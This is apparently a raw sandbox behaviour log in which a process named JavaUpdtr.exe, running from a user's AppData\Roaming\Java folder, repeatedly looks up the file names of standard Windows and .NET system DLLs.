Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
